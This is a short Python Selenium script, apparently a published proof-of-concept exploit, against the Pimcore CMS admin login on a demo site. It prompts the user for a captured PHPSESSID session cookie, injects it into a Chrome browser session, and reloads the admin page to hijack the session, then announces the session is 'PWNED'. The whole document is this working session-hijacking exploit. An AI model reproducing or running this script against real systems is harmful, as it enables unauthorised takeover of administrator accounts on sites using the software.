#!/usr/bin/python # @nu11secur1ty import time from selenium import webdriver import colorama from colorama import Fore, Back, Style driver = webdriver.Chrome() print(Fore.BLUE + "Give the PHPSESSID...\n") print(Style.RESET_ALL) cookie = input() driver.maximize_window() driver.get("https://demo.pimcore.fun/admin/login?perspective=") driver.add_cookie({'name': 'PHPSESSID', 'value': cookie}) print(driver.get_cookie('PHPSESSID')) driver.get("https://demo.pimcore.fun/admin/login?perspective=") time.sleep(3) print(Fore.RED + "Your PHPSESSID is PWNED! Please press any key to close the exploit...") print(Style.RESET_ALL) input() quit()